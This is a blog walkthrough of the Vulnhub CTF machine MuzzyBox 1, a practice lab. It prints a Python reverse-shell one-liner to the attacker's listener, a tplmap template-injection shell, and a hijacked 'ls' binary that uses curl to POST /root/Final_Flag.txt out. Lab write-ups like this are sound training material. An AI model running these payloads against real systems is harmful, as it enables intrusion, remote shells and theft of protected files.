MuzzyBox: 1 Walkthrough Vulnhub CTF

MuzzyBox 1 Walkthrough Vulnhub CTF

Today, we’re sharing another Vulnhub CTF Walkthrough MuzzyBox 1 design by Muzzy This VM machine hosted on Vulnhub.com you can download here the machine link

Our First Step is Finding the target IP Address

netdiscover
MuzzyBox: 1 Walkthrough
Network Scanning

After finding the target IP address Nmap Aggressive scanning (-p- parameter ) all port scanning

nmap -A -p- 192.168.1.25
MuzzyBox: 1 Walkthrough

Nmap scanning we found port 80 & 3000 and 8989, 9633, 15000 open to HTTP Python server, and port 22 open to SSH as well.

open the target IP web browser for port 80 and have found a index.txt file we see the file three challenges

http://192.168.1.25/index.txt
Challenge 1:
Washington State University has built an online library for its students. Only "Principal" is "Authorized". Can you able to bypass their logic for the flag??
Link: http://{IP}:3000/
Link: http://{IP}:9633/idcard.png

Our First challenge is bypassing the Washington State University idcard database

http://192.168.1.25:3000

We can see the id card for upload and we see the author Note Don’t upload the file directly, edit with your name and upload its the screenshot.

http://192.168.1.25:9633/idcard.png

Now Downloading the idcard our localhost

curl http://192.168.1.25:9633/idcard.png --output idcard.png
MuzzyBox: 1 Walkthrough

Now edit the png image file I am using windows inbuilt tool paint we already see the note index.txt Only “Principal” is “Authorized” Washington State University

after editing the again upload the file and our file successfully upload and we found our first Challenge

http://192.168.1.25:8989
Challenge 2:
After the data breach University has developed the new website, but somehow it is still under maintenance. Can you able to list the current directory and read the flag file.
Link: http://{IP}:8989/

opening the URL web browser and we already see the python debugger and I click the console and new popup window is asking console password we already found the password our first challenge

I write a simple python code for listing the directory and our code is working

import os
os.listdir('.')

we need to Starting our natcat listener any port number

python socket reverse payload

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.19",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
MuzzyBox: 1 Walkthrough

nc -lvp 4545
id
MuzzyBox: 1 Walkthrough

reading our second Flag

cat ctf2.py |more
MuzzyBox: 1 Walkthrough
Challenge 3:
After system compromise root user is auditing the webserver files and directories by using "bash ls" and "sudo ls" commands. Can you able to get the /root/Final_Flag.txt file using the Out-of-Band technique ??
Link: http://{IP}:15000/page?name=muzzy

our target is vulnerable Server-Side Template Injection After a search we found an Exploitation Tool Github

http://192.168.1.25:15000/page?name=hackNos.com
MuzzyBox: 1 Walkthrough
Server-Side Template Injection Download Tool

Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.

./tplmap.py -u http://192.168.1.25:15000/page?name='' --os-shell
MuzzyBox: 1 Walkthrough
ls -l ssti
cat ssti/no_flag.txt

login ssh connection with nsctf username and password iamnsce

ssh nsctf@192.168.1.25
id
$PATH

ls -lsa command to we see /usr/local/sbin directory user nsctf our current user nsctf edit any file sbin directory we already see our third Challenge 3 Can you able to get the /root/Final_Flag.txt file using the Out-of-Band technique ??

ls -lsa /usr/local/sbin

again start listening natcat for http post request

nc -lvp 4545

editing the ls command with nano editor and creating a post request with the curl command

nano /usr/local/sbin/ls

curl -i -X POST "http://192.168.1.25:4545" --data "@/root/Final_Flag.txt"

we found our Final Flag

Five86 2 Walkthrough read

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *